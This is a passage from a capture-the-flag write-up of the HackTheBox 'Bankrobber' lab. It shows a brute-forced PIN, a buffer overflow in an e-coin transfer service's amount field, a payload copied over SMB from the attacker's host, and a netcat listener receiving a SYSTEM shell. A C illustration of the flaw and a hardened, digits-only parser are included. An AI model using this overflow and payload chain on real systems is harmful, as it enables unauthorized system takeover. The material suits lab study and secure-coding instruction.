Internet E-Coin Transfer System


  • The custom application listening on port 910 of the target was initially unreachable because of a firewall restriction.
  • Tunneling through Chisel resolved that.
  • It identified itself as the Internet E-Coin Transfer System, which appeared to be a command-line variant of the web application.
  • It also had a security lock (a 4-digit PIN), which was later brute-forced.
  • The application invoked another binary, c:\Users\admin\Documents\transfer.exe, to perform the transfer.
  • The amount parameter was confirmed to be vulnerable to a buffer overflow: input longer than 32 bytes overwrites the adjacent transfer-tool field.

Buffer Overflow


C:\tmp>copy \\10.10.14.10\smb\SystemTransferTool.exe .
copy \\10.10.14.10\smb\SystemTransferTool.exe .
        1 file(s) copied.

Payload transferred over SMB. This will overwrite the transfer-tool field and, hopefully, transfer SYSTEM privileges instead of e-coins.

Now I just need to append the absolute path of the payload to the 32 bytes that fill the buffer.

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ msf-pattern_create -l 32
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab

Generating a 32-byte pattern to fill the amount buffer.

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe

This is the complete input: 32 bytes of filler followed by the path.

┌──(kali㉿kali)-[~/…/htb/labs/bankrobber/bankv2]
└─$ nc 127.0.0.1 9100
 --------------------------------------------------------------
 Internet E-Coin Transfer System
 International Bank of Sun church
                                        v0.1 by Gio & Cneeliz
 --------------------------------------------------------------
 Please enter your super secret 4 digit PIN code to login:
 [$] 0021
 [$] PIN is correct, access granted!
 --------------------------------------------------------------
 Please enter the amount of e-coins you would like to transfer:
 [$] Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe
 [$] Transfering $Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbC:\tmp\SystemTransferTool.exe using our e-coin transfer application. 
 [$] Executing e-coin transfer tool: C:\tmp\SystemTransferTool.exe
 
 [$] Transaction in progress, you can safely disconnect...

Successfully overwrote the transfer-tool field with the path to my tool.
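The overwrite above happens because the amount field and the transfer-tool path sit next to each other in memory and the amount is copied in without a length check. The C program below is an added illustration, not the code of the Bankrobber binary (whose source is not on the page): it models that layout as a hypothetical struct transfer_request with an assumed 32-byte amount field and an assumed 260-byte path field, shows the unbounded copy producing exactly the overwrite seen in the session, and places a bounded, digits-only parser beside it that rejects the same input. The function names and field sizes are assumptions; the default tool path and the 32-byte filler are taken from the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define AMOUNT_LEN    32    /* size of the amount field, as seen in the session */
#define TOOL_PATH_LEN 260   /* assumed size of the transfer-tool path field */

/* Assumed in-memory layout: the amount field sits directly in front of the
 * transfer-tool path, so byte 33 of an over-long amount lands in tool_path[0].
 * This mirrors the behaviour observed in the session; the real binary's
 * layout is not known from the page. */
struct transfer_request {
    char amount[AMOUNT_LEN];
    char tool_path[TOOL_PATH_LEN];
};

/* Constructed inputs modelled on the page: the legitimate tool path, and the
 * 32-byte pattern followed by an attacker-chosen path. */
static const char DEFAULT_TOOL[] = "C:\\Users\\admin\\Documents\\transfer.exe";
static const char OVERLONG_AMOUNT[] =
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab" "C:\\tmp\\SystemTransferTool.exe";

static void init_request(struct transfer_request *req) {
    memset(req, 0, sizeof *req);
    memcpy(req->tool_path, DEFAULT_TOOL, sizeof DEFAULT_TOOL);
}

/* Vulnerable version: copies the user's input byte by byte with no bound,
 * the defect that lets the amount spill into tool_path. */
static void read_amount_unsafe(struct transfer_request *req, const char *input) {
    char *dst = req->amount;
    while (*input != '\0')
        *dst++ = *input++;      /* keeps writing past amount[31] */
    *dst = '\0';
}

/* Hardened version: accepts only 1..31 decimal digits and copies afterwards,
 * so the write can never leave amount[].
 * Returns 0 on success, -1 when the input is rejected (fields untouched). */
static int read_amount_safe(struct transfer_request *req, const char *input) {
    size_t n = strlen(input);
    if (n == 0 || n >= AMOUNT_LEN)
        return -1;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)input[i]))
            return -1;
    memcpy(req->amount, input, n + 1);   /* n + 1 <= AMOUNT_LEN, includes NUL */
    return 0;
}

/* Returns 1 if the unbounded copy replaced the tool path with the attacker's
 * path, i.e. the overwrite observed in the session. */
int unsafe_copy_overwrites_tool(void) {
    struct transfer_request req;
    init_request(&req);
    read_amount_unsafe(&req, OVERLONG_AMOUNT);
    return strcmp(req.tool_path, "C:\\tmp\\SystemTransferTool.exe") == 0;
}

/* Returns 1 if the hardened copy rejects the same input and leaves the
 * legitimate tool path in place. */
int safe_copy_keeps_tool(void) {
    struct transfer_request req;
    init_request(&req);
    int rc = read_amount_safe(&req, OVERLONG_AMOUNT);
    return rc == -1 && strcmp(req.tool_path, DEFAULT_TOOL) == 0;
}

/* Returns 1 if a legitimate numeric amount is still accepted. */
int safe_copy_accepts_number(void) {
    struct transfer_request req;
    init_request(&req);
    return read_amount_safe(&req, "1337") == 0 && strcmp(req.amount, "1337") == 0;
}

int main(void) {
    printf("unsafe copy overwrote tool path:    %d\n", unsafe_copy_overwrites_tool());
    printf("safe copy rejected over-long input: %d\n", safe_copy_keeps_tool());
    printf("safe copy accepted '1337':          %d\n", safe_copy_accepts_number());
    return 0;
}
```

Compiled with `cc -Wall` and run, all three checks print 1. The lesson for a reviewer is that the bounded copy alone is not the whole fix: the field is an amount, so rejecting anything but digits removes the entire class of input that could reach the neighbouring path, and the path itself should never be derived from user-controlled bytes.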

┌──(kali㉿kali)-[~/archive/htb/labs/bankrobber]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 50204
Windows PowerShell running as user BANKROBBER$ on BANKROBBER
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
Bankrobber
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21e
   IPv6 Address. . . . . . . . . . . : dead:beef::141d:3776:23f6:cb98
   Temporary IPv6 Address. . . . . . : dead:beef::7883:7206:63c5:55a8
   Link-local IPv6 Address . . . . . : fe80::141d:3776:23f6:cb98%2
   IPv4 Address. . . . . . . . . . . : 10.10.10.154
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%2
                                       10.10.10.2
 
Tunnel adapter isatap.{0637FAE2-5EF8-43F7-ADAC-E58020091A92}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

It transferred SYSTEM privileges, as I hoped. System-level compromise.